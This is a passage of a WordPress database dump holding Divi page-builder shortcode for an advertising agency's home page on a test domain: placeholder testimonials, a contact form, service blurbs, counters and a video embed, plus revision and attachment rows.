animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 12:09:14','2020-08-07 12:09:14','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(470,1,'2020-08-07 14:29:56','2020-08-07 14:29:56','WhatTheHell? Best Creative Digital Advertising agency','main banner','','inherit','open','closed','','banner','','','2021-03-18 06:10:51','2021-03-18 06:10:51','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg',0,'attachment','image/jpeg',0),(471,1,'2020-08-07 14:30:11','2020-08-07 14:30:11','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" title_text=\"banner\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.png\" alt=\"Why We creative agency\" title_text=\"Why we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" 